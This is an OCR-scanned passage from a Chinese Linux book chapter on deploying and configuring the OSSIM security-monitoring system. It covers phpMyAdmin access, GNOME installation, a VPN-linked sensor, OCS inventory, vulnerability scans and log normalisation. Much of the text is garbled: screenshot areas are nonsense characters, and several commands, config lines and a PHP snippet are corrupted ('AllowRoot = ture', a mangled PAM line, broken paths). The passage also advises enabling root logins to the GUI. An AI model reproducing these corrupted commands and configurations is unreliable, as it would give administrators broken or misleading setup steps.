打开 浏览 器 访问 phpMyAdmin， 输 入 网 址 https://ip/ossim/phpmyadmin/， 遇 到 用 户 名 和 密 


码 有 些 读者 可 能 就 不 知道 怎么 做 了 ,其 实 登 录用 户 名 就 是 root 和 MySQL 数据 库 的 密码 。 这 个 
密码 信息 在 /etc/ossim/ossim_setup.conf 同样 能 看 到 。 访 问 效果 如 图 10-53 所 示 。 


胃 localhost 


雹 首播 让 ”加 SQL 于 状态 “国安 里加 字符 集 多 引 千 。 从 权 限 和 哩 制 。 钨 进程 部 出 
-各 SA 用 月 餐 


全 运行 信息 
各 新 重 轩 四 
此 MySQL 荐 和 洒 已 经 运行 了 0 天 4 小 时 ，14 分 44 妙 ， 启 动 时 间 为 2013 年 05 月 30 日 06:41。 


nDe SSL 本 本 用 全 二 开拓 日 时 下 本 延 寺 入 键入 上 于 下 制 关怀 二 沁 
i 


服务 器 祝 量 ， 这 些 来 显示 了 此 MySQL 服务 器 自 启动 以 来 的 网 络 流量 搞 计 。 


已 扒 收 ”135 MB 。 32 MB 
已 发 送 103 xm。 24 了 
总 计 23e mB Sem 


总 计 6Gr3110 1,439.15 100.00% 
图 10.53 访问 phpMyAdmin 界面 


Ossim4 系统 中 默认 有 13 个 数据 库 , 在 左边 一 栏 中 显示 了 13 个 数据 库 , 后 面 括号 中 的 数 

字 代 表 表 的 数目 。 

上 面 讲 了 源码 安装 phpMyAdmin， 也 可 以 在 Ossim 4x 系统 中 采用 以 下 方式 安装 。 

如 果 在 Ossim 系统 下 安装 phpMyAdmin， 首 先 要 停止 MySQL 数据 库 : 

#alienvault-update 

#apt-get install phpmyadmin \\ 下 载 包 大 小 约 为 1 8MB 

系统 提示 输入 数据 库 和 管理 员 密 码 经 过 配置 就 可 以 使 用 ,这 里 和 源码 包 使 用 不 同 的 是 输入 
地 址 为 Http://IP/phpmyadmin/。 

在 使 用 phpMyAdmin 时 需要 注意 两 点 ， 首 先 为 了 安全 要 安装 最 新 的 正式 发 布 版 本 ， 其 次 
安装 到 服务 器 后 目录 不 能 保留 默认 的 名 称 ， 建 议 将 目录 改 一 下 。 


10.7.4 安装 X-Window 


默认 情况 下 为 了 提高 性 能 Ossim 是 不 提供 图 形 环境 , 有 些 读者 需要 涉及 到 安装 X-Window 
(本 实验 在 Ossim 3.1 和 4.2 系统 下 通过 ) 环境 ， 接 下 来 就 已 安装 Gnome 桌面 环境 举例 讲解 。 
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首先 执行 以 下 两 条 命令 。 


#alienvault-update 
#apt-get install gnome 


执行 完 这 条 命令 ， 紧 接着 开始 下 载 、 解 包 安 装 X-Windows 软件 集 ， 如 果 是 从 Ossim 4.1 
环境 下 安装 ， 下 载 容 量 约 为 1.22GB， 所 以 一 定 要 确保 有 足够 的 空间 系统 解压 包 和 安装 包 的 空 
间 。 下 载 时 间 就 要 看 您 的 网 络 带 宽 了 ， 下 载 的 文件 都 放 在 /var/cache/apt/archives 目录 下 ， 接 着 
系统 会 解 包 安 装 然后 重启 系统 ， 最 后 就 自动 出 现 图 形 化 登录 窗口 。 

这 时 候 ， 你 会 发 现 无 论 普通 用 户 还 是 root 用 户 都 无 法 登录 Gnome 图 形 窗口 , 我们 还 需要 做 一 
些 修改 ,重启 系统 并 进入 到 单 用 户 模式 。 解 决 方法 是 在 GRUB 启动 界面 选择 Debian GNU/Linux,with 
Linux 2.6.32-5-amd64(recovery mode)， 按 回 车 键 开始 进入 单 用 户 模式 ， 待 看 到 如 下 提示 : 


(or type control-D to continue) :输入 口令 


进入 单 用 户 模式 后 ， 开 始 修改 gdm3 下 的 配置 文件 : 
vi /etc/gdm3/daemon.conf 

在 [security] 一 行 下 增加 一 行 : 

AllowRoot = ture 


然后 ， 接 着 修改 gdm3 配置 文件 : 


#vi /etc/pam.d/gdm3 


注销 这 行 : 

auth required pam succeed if.so user != root quiet success 

经 过 以 上 操作 就 可 以 进入 图 形 界面 ， 并 以 root 身份 登录 系统 。 此 方法 适用 Debian 6/7 系统 : 
#init 2 


注意 : 如 果 你 习惯 使 用 Red Hat Linux， 将 图 形 登录 方式 转换 为 字符 登录 的 方法 是 将 
/etc/inittab 文件 中 “id:5:initdefault” 的 5 换 成 3 即 可 。 但 对 于 Ossim 系统 ( 它 是 基于 Debian Linux) 
就 不 那么 简单 ， 它 默认 启动 级 别 是 2， 图 形 启 动 级 别 也 是 2。 


我 们 知道 ，chkconfig 命令 是 Red Hat 公司 遵循 GPL 规则 所 开发 的 程序 ， 它 可 查询 操作 系 
统 在 每 一 个 执行 等 级 中 会 执行 哪些 系统 服务 ， 其 中 包括 各 类 常 驻 服务 。 在 Ossim 系统 中 除了 
这 款 工具 以 外 ,还 有 Debian 专用 的 update-rc.d 工具 ， 它 和 chkconfig 工具 类 似 , 不 同 的 是 它 只 
是 一 个 脚本 而 不 是 二 进 制程 序 。 

当 你 在 Debian 下 安装 一 个 新 的 服务 器 ， 例 如 Apache2， 装 完 之 后 默认 它 会 启动 ， 并 在 下 
次 重启 后 自动 运行 , 但 如 果 你 不 需要 自动 启动 呢 ， 可 以 禁用 它 ， 直 到 你 手工 启用 。 要 实现 这 个 
目的 有 种 方法 是 手工 修改 /etc/rcx.d 目录 的 apache2 的 符号 连接 文件 ， 这 个 方法 不 难 , 但 是 效率 
较 低 ， 所 以 建议 使 用 update-rc.d 命令 实现 。 

(1) 删除 一 个 服务 


#update-rc.d -f apache2 remove 
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(2) 增加 一 个 服务 


#update-rc.d apache defaults 


在 Ossim 系统 中 另外 一 个 管理 和 控制 服务 的 工具 是 invoke-rc.d， 它 和 Red Hat Linux 下 的 
service 和 ntsysv 工具 类 似 ， 更 多 使 用 方法 大 家 可 以 用 man 帮助 查询 。 在 Ossim 下 可 以 通过 安 
装 sysv-re-conf 工具 调整 命令 行 登录 和 图 形 化 登录 方式 。 

#apt-get install sysv-rc-conf 

#sysv-rc-conf 

如 图 10-54 所 示 , 在 显示 界面 发 现 原来 Debian 默认 的 runlevel 2、3、4 和 5 级 都 是 图 形 界 
面 ， 我 们 现在 选 runlevel 为 3， 去 掉 3 的 gdm (或 者 xdm/kdm) 。 


Ele Edt Yiew Jerminal Tabs Help 


Terminal | Terminal 


h 
hdparm 
heartbeat 


] 
图 10.54 配置 启动 服务 


(3) 为 虚拟 机 中 的 Ossim 安装 Vmware-tools 

如 果 你 经 常 和 义 -Window 打交道 , 还 是 将 vmware-tools 装 上 比较 方便 , 由 于 在 刚刚 装 好 的 

Ossim 系统 中 没有 gcc， 也 没有 内 核 头 文件 ， 所 以 需要 自己 安装 ， 这 里 用 到 apt-get、apt-cache、 
uname 这 几 个 命令 。 


中 安装 gcc 


#apt-get install gcc 


回 安装 header-dev 


#uname -r 

2.6.32-5-amd64 

#apt-cache search headers 2.6.32-5-amd64 
linux-headers-2.6.32-5-amd64 - Header files for Linux 2.6.32-5-amd64 
#apt-get install linux-headers-2.6.32-5-amd64 


大 概 安装 大 小 为 35MB。 
10.7.5 配置 解析 


为 了 让 Ossim 能 够 顺利 解析 所 监控 的 服务 器 发 来 的 日 志 ， 我 们 需要 配置 hosts 这 个 文件 ， 
我 们 知道 hosts 文件 的 作用 相当 于 DNS。Linux 系统 在 向 DNS 服务 器 发 出 域名 解析 请 求 之 前 ， 
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会 查询 /etc/hosts 文件 ， 如 果 里 面 有 相应 的 记录 ， 就 会 使 用 hosts 里 面 的 记录 。/etc/hosts 文件 通 
OO localhost.localdomain localhost 
可 以 将 你 所 监控 的 所 有 服务 器 人 和 主机 名 称 对 应 起 来 加 入 这 个 文件 中 ， 每 条 记录 对 应 一 
台 主机 ， 然 后 分 发 到 各 台 服 务 器 上 。 


10.7.6 “分 布 式 部 署 〈VPN 连接 ) 举例 


有 时 候 我 们 需 在 互联 网 环境 下 分 布 部 署 漏洞 扫描 系统 ， 这 时 需要 设置 VPN 连接 。 我 们 举 
例 说 明 。 
首先 装 好 Ossim Server， 四 个 组 件 都 要 安装 ， 服 务 器 和 探 针 IP 规划 如 下 : 


@ 服务 器 IP: 192.168.225.20。 
® Sensor IP: 192.168.225.50。 


在 服务 器 成 功 启动 后 ,首先 检查 各 项 服务 工作 是 否 正常 , 在 Web UI 中 检查 就 可 以 了 , 方 
法 以 前 介绍 过 ， 然 后 开始 安装 探 针 ， 这 里 我 们 选用 VPN 方式 和 服务 器 连接 ， 在 安装 时 我 们 分 
配给 它 一 个 内 网 他， 主要 是 和 服务 嚣 能够 通信 。 如 下 图 所 示 。 我 们 输入 服务 器 IP 地 址 ， 这 时 
系统 立即 提示 “Would you like the system to configure the connection between this host and 
Alienvault Server(192.168.225.20) using a VPN Network?Network connectivity between the two 
host will be required to apply this configuration”， 如 果 按 往常 操作 我 们 不 通过 VPN， 直 接 选 择 
NO 就 会 继续 安装 , 这 里 我 们 选择 Yes 进行 VPN 连接 测试 , 系统 提示 “Please,enter the root user 
password of the remote Alienvault Server(192.168.225.20)”。 

当 VPN 连接 成 功 以 后 系统 提示 “A VPN Network has been configured between the 
AlienVault Server and this host. The IP address used by this host vithin the VPN network is 
10.67.68.12,and the ip address of the AlienVault Server is 10.67.68.1”。 


有 检 查 SeIVeT 和 Sensor 4 间 通 信 


首先 检查 日 志 。 
Sensor 端 日 志 : #tail -f/var/log/ossim/agent.log， 如 图 10.55 所 示 。 


图 10.55 agentlog 日 志 内 容 
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2. 插入 一 个 新 sensor 并 检查 结果 


在 Configuration 一 Alienvault Components 选项 中 插入 一 个 新 的 sensor， 卫 为 在 VPN 中 的 
sensor IP， 如 图 10.56 所 示 。 


Er 7 
Sensors ospane1 02 oO mer | 
发 New 局 Modiy 局 Delele seected 也 Appy <» Total Sensors 2 «> Active Sensors: 2 碟 Sensor Status 
p Nome prong Version Status Descripion 
192168225.20 Tocahost 5 410 v 
< 7 
Show 四 加 KA Peel jo pH 名 @ 


图 10.56 插入 一 个 新 的 sensor 
然后 通过 ssh 登录 sensor 产生 一 些 日 志 。 接 下 来 就 可 以 在 Analysis 一 SIEM 中 查看 日 志 了 ， 
如 图 10.57 所 示 。 
在 安装 Sensor 时 ， 通 过 VPN 连接 比较 容易 设置 。 


图 10.57 在 Analysis 一 SIEM 中 查看 日 志 


首先 确保 Server 端 Openvpn 工作 正常 ， 然 后 在 Sensor 端 初次 安装 时 ， 就 可 以 选择 服务 器 
JP 和 root 的 口令 ， 来 通过 VPN 连接 。 

有 几 个 特殊 文件 需要 注意 : VPN 地 址 池 在 Server 端的 ossim_setup.conf 配置 文件 的 [vpn] 
中 定义 ， 通信 端口 为 33800。 在 Ossim Server 端 ，/etc/openvpn/AVinfraestructure/keys/ 目 录 下 有 
几 个 证 书 需 要 注意 他 们 是 安装 openvpn 过 程 生 成 Root CA 证 书 ， 用 于 签发 Server 和 Client 证 
书 ， 其 中 ca.crt、ca.key 就 是 根 证 书 文 件 。dh1024.pem 就 是 服务 器 生成 Diffie-Hellman 文件 ， 
有 关 它 的 解释 我 们 将 在 第 12 章 讨论 。Diffie-Hellman 表示 一 种 确保 共享 KEY 安全 穿越 不 安全 
网 络 的 方法 , 这 个 机 制 的 巧妙 在 于 需要 安全 通信 的 双方 可 以 用 这 个 方法 确定 对 称 密 钥 。 然 后 可 
以 用 这 个 密 钥 进行 加 密 和 解密 。 其 中 alienvcd.csr、alienvcd.crt、 alienvcd.key 就 是 为 服务 器 生 
成 的 密 钥 和 证 书 。 在 服务 器 端的 /etc/openvpn/nodes 目录 下 存放 着 节点 的 密 钥 的 压缩 包 ， 格 式 
为 了 Ptargz (例如 192.168.225.50.tar.gz) ， 在 Sensor 端的 /etc/openvpn/192.168.225.50/ 目 录 下 存 


=。385。 
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放 着 根 证 书 和 .crt、.csr、key 几 个 证 书 。 大 家 务必 要 保存 好 这 几 个 证 书 以 防止 泄密 。 


10.7.7 ”Ossim 的 系统 配置 


1. 要 启动 IT 资产 管理 ， 首 先 要 启动 OCS 服务 


要 启动 OCS 服务 需要 运行 下 面 两 个 脚本 ， 然 后 就 可 以 看 到 系统 组 件 的 分 布 情况 ， 如 图 
10.58 和 图 10.59 所 示 。 


#cd /usr/share/ossim-installer/ocs/ 
#./install ocs.sh 
#./0CS Linux server 1.01.0ssim/setup.sh 


Erocuive \ Tickats ¥ Secunty ¥ Nomwork 》 ventory \ Vunerabites 【Comelance 


有 可 


um 


图 10.58 详细 目录 信息 
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图 10.59 系统 组 件 分 布 情况 
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OCS 是 用 于 帮助 网 络 或 系统 管理 员 , 跟踪 网 络 中 计算 机 配置 与 软件 安装 情况 的 应 用 程序 ， 
收集 硬件 和 系统 信息 ; OCS Inventory 也 可 以 用 来 发 现 网 络 中 所 有 的 活动 设备 ， 如 交换 机 、 路 
由 器 、 网 络 打印 机 等 。 

代理 程序 需要 安装 在 客户 端 计算 机 上 ， 在 Windows 系统 下 ，OCS Inventory NG 提供 了 
一 个 工具 , 使 用 户 可 以 通过 Active Directory GPO 或 登录 脚本 来 轻松 部 署 代理 程序 ,而 在 Linux 
系统 下 ， 只 能 通过 手工 来 安装 代理 程序 。 
管理 服务 器 包含 了 4 个 组 件 。 


Data Server: 用 于 存储 收集 到 的 客户 端的 软 、 硬 件 信 息 。 

Communication server: 用 于 支持 数据 库 服 务 器 与 代理 之 间 的 HTTP 通信 人。 

Deployment server: 用 于 存储 所 有 包 部 署 的 配置 信息 (需要 HTTPS 支持 )。 

Administration console: 允许 管理 员 通 过 喜爱 的 浏览 器 来 查询 数据 库 服 务 器 的 库存 信息 
(Windows 客户 端 安装 方法 较为 简单 ， 这 里 就 不 做 详细 介绍 )。 


这 几 个 组 件 可 以 安装 在 一 台 计 算 机 上 , 也 可 以 安装 在 不 同 的 计算 机 以 便 实 现 负 载 。 如 果 网 
络 中 的 客户 端 数量 超过 10000 的 话 , 那么 最 好 使 用 两 个 或 更 多 不 同 的 服务 器 , 一 个 用 来 做 数据 
库 服务 器 + 通信 服务 器 ， 另 一 个 用 来 做 数据 库 复制 服务 器 + 管理 服务 器 + 部 署 服务 器 。 

OCS Inventory NG 通过 在 客户 端 上 运行 一 个 代理 程序 来 收集 所 有 的 硬件 信息 和 软件 安装 
信息 。 使 用 管理 服务 器 (Management Server) 来 集中 处 理 、 查 看 库存 清单 结果 和 创建 部 署 包 ， 
如 图 10.60 所 示 。 在 管理 服务 器 与 代理 程序 之 间 通 过 HTTP/HTTPS 来 进行 通信 ， 所 有 的 通信 
数据 都 使 用 Zlib 压缩 成 XML 格式 ， 以 便 减 小 网 络 的 平均 流量 。 


eeeg@ 证 


CoNNMIEATON DeptovwEN, ADMINISTRATION 
CONSOLE 


图 10.60 管理 服务 器 


当 通 过 验证 进入 系统 后 , 立刻 展现 在 我 们 眼前 的 是 事件 、 日 志和 评估 风险 的 图 像 ， 如 果 没 
有 显示 完整 ， 很 可 能 是 由 于 浏览 器 不 支持 Flash 插件 。 


2. 监控 服务 器 区 域 的 网 段 进行 扫描 获取 主机 基本 信息 
如 图 10.61 所 示 ， 定 位 到 Tools 一 Net Discovery， 选 择 手动 扫描 ,输入 CIDR 地 址 ， 这 里 是 
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192.168.150.0/24, 表示 这 个 网 段 的 卫 地 址 从 192.168.150.1 开始 到 192.168.150.254 结束 , 扫描 
模式 一 般 选 择 “FastScan”， 如 果 机 器 数量 大 于 5 台 建 议 不 要 选择 Full Scan， 扫 描 时 间 以 机 器 
数量 为 准 。 扫描 完 成 后 不 要 忘记 确认 Update database values 更 新 数据 库 。 这 一 步 刚 刚 完 成 收集 
主机 的 基本 信息 的 任务 ， 下 面 将 进行 更 详细 的 主机 分 析 、 主 机 的 安全 信息 和 事件 分 析 管 理 。 


Please, select the network you want to scan: 


Manual 司 [192.168.150.0/24 
anual inpot e81546 


resukts 
os en Host Mac 05 | Services 


192,168.150.2 
192.168.150.10 00: 


192.168.150.20 


192,168,150.141 于 VMware 
192.168.150.148 00:0C; E4 VMware 
192,168,150.153 00:0c: :08 VMware 
192,168,150,163 00:0C:29:70:E9:57 YMware 


图 10.61 Net Discovery 选项 卡 


3. 对 指定 主机 进行 漏洞 扫描 
定位 到 Analysis 一 Vulnerabilities 一 Scan Jobs 一 新 建 扫描 任务 ,填写 网 段 的 基本 信息 ， 如 图 
10.62 所 示 。 


WIN 
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图 10.62 新 建 扫描 任务 


填写 完毕 后 为 确保 没有 错误 ， 可 单 击 Configuration Check 按钮 对 配置 文件 进行 检查 确认 ， 
如 图 10.63 所 示 。 整 个 扫描 的 内 容 之 详细 是 你 无 法 想象 的 。 


Target Inventory 
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图 10.63 ”对 配置 文件 进行 检查 确认 
图 10.64 列 出 了 扫描 完成 后 自动 生成 的 饼 图 ， 显 示 了 当前 主机 的 安全 等 级 和 开放 的 服务 。 
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深 红色 的 区 域 (High 27) 表示 高 危 主机 存在 严重 的 漏洞 ， 需 要 处 理 。 
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图 10.64 ”扫描 完成 后 自动 生成 的 饼 图 
在 Reports 选项 卡 中 ， 如 图 10.65 所 示 ， 红 色 区 域 的 主机 需要 工程 师 们 仔细 排查 处 理 。 


如 果 需 要 查看 扫描 报告 ， 这 时 只 须 在 Scan Jobs 选项 卡 里 选择 相应 的 输出 类 型 即 可 ， 默 认 
系统 支持 Excel、PDF、HTML 等 格式 输出 。 图 10.66 就 是 生成 的 长 达 143 页 的 报告 。 
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图 10.65 ”Reports 选项 卡 
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图 10.66 ”扫描 报告 


我 们 还 可 以 对 报告 进行 定制 ， 在 右边 的 窗 格 中 ， 定 位 到 Reports 一 Reports， 如 图 10.67 所 
示 。 


391 


Linux ”企业 应 用 案例 精 解 


图 10.67 定制 扫描 报告 
在 这 里 监控 主机 状态 的 工作 变 得 十 分 容易 ， 定 位 到 Assets 一 Assets， 单 击 “New” 按 钮 添 


加 主机 ， 如 图 10.68 所 示 。 
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图 10.68 ”添加 需要 监控 的 主机 
在 Hosts 选项 卡 中 ， 填 写 主 机 信息 ， 如 图 10.69 所 示 。 添 加 服务 ， 如 图 10.70 所 示 。 


10.69 填写 主机 信息 
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图 10.70 添加 服务 


在 这 里 , 添加 主机 和 服务 变 得 更 加 直观 , 而 且 可 以 更 加 方便 地 查看 网 络 拓扑 , 还 可 以 显示 
每 一 台 主机 的 信息 ， 如 图 10.71 所 示 。 
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图 10.71 第 一 台 主机 的 信息 
单 击 Host Problems 按钮 ， 可 直接 列 出 网 络 中 当前 主机 的 详细 信息 ， 如 图 10.72 所 示 。 
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Sensor: [opensourcesim 加 [Service Detal | Host Detai | Status Overview ET 人 
Comments | Downtime | Process Info | Performance Info | Scheduing Queue ] 
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Host Status Totals Service Status Totals 


图 10.72 当前 主机 的 详细 信息 


选择 Status Map， 在 Layout Method 选项 中 选择 Balanced tree, 结果 如 图 10.73 所 示 ， 如 果 
主机 过 多 ， 图 像 显 示 会 非常 密集 ， 可 以 调整 Scaling factor 的 数值 ， 直 到 满意 效果 ， 如 图 10.74 
所 示 。 在 菜单 上 选择 “Status Grid”， 结 果 如 图 10.75 所 示 。 
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图 10.73 所 有 主机 信息 1 
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图 10.74 所 有 主机 信息 2 
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图 10.75 所 有 主机 状态 一 览 表 


可 以 展示 所 有 主机 开放 应 用 的 情况 ,也 可 以 反映 出 某 一 主机 的 应 用 在 每 个 时 间 段 的 工作 情 
况 ， 绿 色 表示 正常 ， 红 色 表 示 有 故障 发 生 ， 需 要 处 理 ， 如 图 10.76 所 示 。 
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图 10.76 主机 的 工作 状况 
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Ossim 不 但 能 够 将 网 络 主机 的 各 种 信息 和 数据 进行 存储 加 工 , 自己 的 健康 状况 也 能 明确 的 
显示 出 来 ， 从 Disk、Network、Postfix、Processes、Sensors、 System 的 各 个 方面 记录 着 各 种 运 
行 状态 ， 以 供 管理 员 及 时 处 理 ， 如 图 10.77 所 示 。 


sssssyssy 


图 10.77 System 信息 


在 构建 分 布 式 系统 方面 ，Ossim 能 生成 直观 的 拓扑 图 ， 如 图 10.78 所 示 ， 在 每 台 主 机 上 设 
置 参 数 也 十 分 方便 。 


Er 


10.78 ”Ossim 生成 的 拓扑 图 
如 图 10.79 所 示 ， 可 以 自己 选 定 拓扑 图 。 
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图 10.79 ”自己 选 定 拓扑 图 


10.7.8 ”Ossim 的 后 台 管理 及 配置 


Ossim 不 但 功能 强大 ， 还 提供 了 友好 的 管理 界面 ， 我 们 选择 左边 导航 栏 的 Configuration 一 
Main 一 Advanced 选项 就 可 以 看 到 各 主要 子 系统 的 基本 配置 情况 。 图 10.80 显示 了 修改 Snort 
的 基本 配置 和 Ossim 的 备份 目录 。 


10.80 ”修改 Snort 的 基本 配置 和 Ossim 的 备份 目录 
在 插件 管理 界面 ， 可 以 对 每 个 插件 进行 添加 、 删 除 等 修改 操作 ， 如 图 10.81 所 示 。 


Be 


Linux ”企业 应 用 案例 精 解 


es 


Het too tb remake 而 
盖世 


图 10.81 插件 管理 界面 


如 果 你 对 它们 十 分 了 解 ， 还 可 以 对 Snort 和 Nessus 做 十 分 复杂 的 交叉 管理 配置 ， 定 位 到 
Intelligence 一 Cross Correlation， 在 Rules 选项 卡 中 展示 了 7363 种 规则 ， 如 图 10.82 所 示 。 若 需 
要 修改 , 则 用 鼠标 选中 某 一 项 , 单 击 Modify 按钮 即 可 , 不 过 这 些 修改 要 慎重 , 否则 会 影响 Ossim 
整体 效率 。 通 常 我 们 只 要 选取 所 需要 的 就 行 了 。 需 要 说 明 的 是 IDS 实质 上 归结 为 对 安全 审计 
数据 的 处 理 。 这 种 处 理 可 以 针对 网 络 数据 ,也 可 以 针对 主机 的 日 志文 件 。 一般 就 是 采用 类 似 病 
毒 检测 的 办 法 , 对 各 种 已 知 的 攻击 方式 进行 特征 提取 ,建立 攻击 模式 库 , 通过 实际 的 检测 数据 
与 模式 库 的 比较 来 检测 入 侵 行 为 。 
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1. 加 装 双 网 卡 提高 Ossim 性 能 


在 长 期 的 部 署 应 用 中 发 现 , 利用 传统 的 服务 器 集成 的 网 卡 来 收集 、 分 析 数 据 包 时 ,数据 包 
应 用 范围 比较 狭窄 ， 例 如 在 出 口 带 宽 为 10MB 的 路 由 器 的 接口 ， 如 果 监 控 企业 内 部 高 速 网 络 
则 会 出 现 大 量 丢 包 ,失去 了 监控 的 意义 。 笔 者 建议 除了 选用 高 性 能 服务 器 以 外 ， 还 应 该 在 服务 
器 另外 加 装 双 干 光 高 性 能 网 卡 。 


2. 与 其 他 流量 监控 软件 集成 


有 的 人 喜欢 Cacti 的 流量 监控 ， 希望 把 它 集 成 到 Ossim 中 ， 这 时 我 们 需要 修改 一 下 PHP 
代码 , 首先 需要 安装 Cacti 并 配置 好 , 然后 我 们 需要 编辑 /usr/share/ossim/www/menu_options.php 
文件 (大 约 在 1042 行 的 位 置 加 入 如 下 代码 )。Cacti 的 集成 效果 图 如 图 10.83 所 示 ，Zabbix 和 
Ossim 的 集成 图 如 图 10.84 所 示 。 


$menu["Monitors"] [] = array( 
"name" => gettext ("Cacti"), 


To Cactiy 
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"Url" => “https//192.168-.150-100/cacti”"s 
) 
Smenu["Monitors"][] = array( 

"name"” => gettext ("Zabbix"), 

"id”=> "Zabbix", 

url" => "http://192.168.150.100/zabbix", 
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图 10.83 ”Cacti 集成 效果 图 
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图 10.84 ”Zabbix 和 Ossim 集成 效果 图 
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3. 漏洞 扫描 应 用 


企业 中 查找 漏洞 要 付出 很 大 的 努力 ,不 是 简单 的 在 服务 器 上 安装 一 个 漏洞 扫描 软件 就 可 以 
的 , 那样 起 不 了 多 大 作用 。 这 并 不 是 因为 企业 中 拥有 大 量 服务 器 和 主机 设备 ,而 这 些 服务 器 和 
设备 又 同 不 同 速率 的 网 络 互联 ， 只 是 我 们 在 期 望 的 时 间 内 无 法 获得 所 需 的 覆盖 范围 。 

目前 ， 欧 美 许多 国际 安全 组 织 都 按照 自己 的 分 类 准则 建立 了 各 自 的 数据 库 。 其 中 , 主流 是 
CVE 和 XForce。 它 的 好 处 是 ， 当 网 络 出 现 安全 事故 、 入 侵 检测 系统 (IDS) 产生 警报 时 ， 像 
CVE 这 类 标准 的 系统 脆弱 性 数据 库 网 络 安全 工作 就 显得 极为 重要 ! 目前 ， 在 中 国 国家 计算 机 
网 络 应 急 处 理 协调 中 心 (CNCERT/CC ) 的 领导 下 ， 国 内 也 组 建 了 自己 的 CVE 组 织 
一 一 CNCVE，CNCVE 组 建 的 目的 就 是 建设 一 个 具有 中 国 特 色 的 、 能 为 国内 广大 用 户 服 务 的 
CVE 组 织 .但 并 不 是 说 拥有 了 CVE 就 能 解决 所 有 漏洞 问题 ,除了 这 些 开放 的 脆弱 性 数据 库 外 ， 
还 应 该 存在 大 量 的 、 没 有 对 公众 开放 的 脆弱 性 数据 库 。 


(1) CVE 

CVE (Common Vulnerabilities and Exposures) 是 由 美国 国土 安全 部 门 (US DepartmentOf 
Homeland Security， 简 称 DHS) 成 立 ， 由 非 盔 利 组 织 MITRE 公司 管理 和 维护 至 今 。 

Vulnerability (漏洞 ， 胞 弱 性 〉 这 个 词汇 可 以 有 狭义 和 广义 多 种 解释 。 如 Finger 服务 ， 可 
能 为 入 侵 者 提供 很 多 有 用 的 资料 , 但 是 该 服务 本 身 有 时 是 业务 必须 的 , 所 以 不 能 说 该 服务 本 身 
有 安全 问题 。 

为 使 独立 的 脆弱 性 数据 库 和 不 同安 全 工具 彼此 之 间 能 够 更 好 地 共享 数据 ， 脆 弱 性 数据 
库 如 图 10.85 所 示 。CVE 的 标准 命名 方式 是 由 CVE、 时 间 和 编号 共同 组 成 的 。 例 如 ， 命 名 为 
“CVE-2008-6021” 的 条 目 表示 2008 年 第 6021 号 脆弱 性 。 
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图 10.85 ”脆弱 性 数据 库 示 例 
CVE 的 内 容 是 CVE 编辑 委员 会 合作 努力 的 成 果 , 如 图 10.86 所 示 。 这 个 委员 会 的 成 员 来 
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自 许多 安全 相关 的 组 织 ， 如 软件 开发 商 、 大 学 研究 机 构 、 政 府 组 织 和 一 些 优秀 的 安全 专家 等 ， 
如 图 10.86 所 示 。CVE 还 可 以 免费 阅读 和 下 载 。 
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图 10.86 CVE 脆弱 性 数据 库 


(2) OSVDB 

OSVDB (Open Source Vulnerability Database) 是 由 一 个 社团 组 织 创立 并 维护 的 独立 开源 
的 数据 库 。 它 最 早 是 在 2002 年 的 Black Hat 和 Defcon 安全 会 议 上 提出 的 一 项 服务 ， 提 供 了 
一 个 独立 于 开发 商 的 脆弱 性 数据 库 实现 方案 。 和 CVE 一 样 ，OSVDB 数据 库 也 是 开源 并 且 免 
费 的 。 它 由 安全 事业 爱好 者 来 维护 ， 向 个 人 和 商业 团体 免费 开放 。 两 者 的 差异 在 于 CVE 提供 
标准 名 称 , 可 以 通俗 理解 为 数据 字典 ; 而 OSVDB 为 每 一 条 脆弱 性 提供 了 详尽 的 信息 , OSVDB 
需要 参考 CVE 的 名 称 。 


(3) BugTraq 

BugTraq 是 由 Security Focus 管理 的 Intemet 邮件 列表 ， 现 在 已 被 赛 门 铁 克 公司 收购 。 在 
电脑 安全 世界 ，BugTraq 相当 于 最 权威 的 专业 杂志 。 大 多 数 安全 技术 人 员 订 阅 BugTraq， 因 为 
这 里 可 以 抢先 获得 关于 软件 .系统 漏洞 和 缺陷 的 信息 ,还 可 以 学 到 修补 漏洞 和 防御 反击 的 招数 ， 
如 图 10.87 和 图 10.88 所 示 。 
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图 10.87 ” Vulnerabilities 选项 卡 
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图 10.88 ”系统 漏洞 和 缺陷 信息 


10.8 ”Ossim 插件 配置 管理 


前 面 讲 过 当 Ossim 安装 后 ， 只 需 简单 就 能 自动 发 现 网 络 ， 下 面 我 们 经 过 一 些 设 置 就 能 实 
现 自动 接受 并 处 理 日 志 ， 这 些 功能 的 技术 实现 难度 不 高 ， 但 是 带 给 用 户 体验 却 很 直观 很 实用 。 
为 了 提高 性 能 在 Ossim 系统 中 为 每 个 插件 使 用 一 个 指定 的 日 志文 件 , 它 在 Rsyslog 系统 记录 的 
标签 上 过 滤 所 采集 的 日 志 。 这 里 比较 难于 理解 的 是 Ossim 的 归 一 化 处 理 过 程 ， 它 在 归 一 化 处 
理 阶段 的 一 系列 规则 ， 适 用 于 从 源 提取 数据 系统 ， 以 便 Ossim 在 一 个 共同 的 格式 。 


10.8.1 原始 日 志 格 式 对 比 


原始 日 志 可 能 是 一 个 通用 的 系统 消息 、 应 用 程序 日 志 、SNMP Trap, 但 是 这 些 日 志 格 式 不 
统一 ， 无 法 做 关联 分 析 ， 首 先 Ossim 需要 将 他 们 输出 成 统一 格式 ， 下 面 我 们 先 看 个 例子 。 

举例 : 我 们 先 看 一 条 普通 的 ssh 的 日 志 ， 也 是 原始 〈 裸 ) 日 志 格式 。 

主机 server-1，/var/log/auth.log 文件 显示 内 容 如 下 : 


May 30 13:15:52 server-1l sshd[13980]: Accepted pasword for root from 
192.168.150.20 port 4545 ssh2 


经 过 归 一 化 日 志 处 理会 发 生 什 么 变化 呢 ? 这 些 字 段 可 以 填充 从 日 志 消息 或 静态 通过 插件 
的 信息 。 归 一 化 处 理 后 的 日 志 如 下 。 
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在 Ossim sensor 机 器 中 的 日 志 ，/var/log/ossim/agent.log 内 容 如 下 : 


2013-05-30 13:15:49,441 Output [INFO] :event type="detector" date="1275239780" 
sensor="192.168.150.201" interface="eth0O" Plugin id="4003" Plugin sid="7" 
sro ip="192.168.150.20" src port="4545" dst ip="192.168.150.200" dst port="22" 
username="root" log="May 30 13:52 server-1 sshd[13980] :Accepted password for root 
from 192.168.150.20 port 4545 ssh2" fdate="2013-05-30 13:15:52" tzone="8.0” 


看 起 来 比 原来 复杂 了 许多 ， 但 这 是 为 了 统一 标准 格式 。 它 会 传送 至 server 的 EDB 数据 库 
中 统一 存储 。 

我 们 再 看 看 Ossim 服务 器 对 于 这 样 的 事件 都 做 了 哪些 处 理 呢 ? 这 包括 特定 的 类 型 、 子 类 
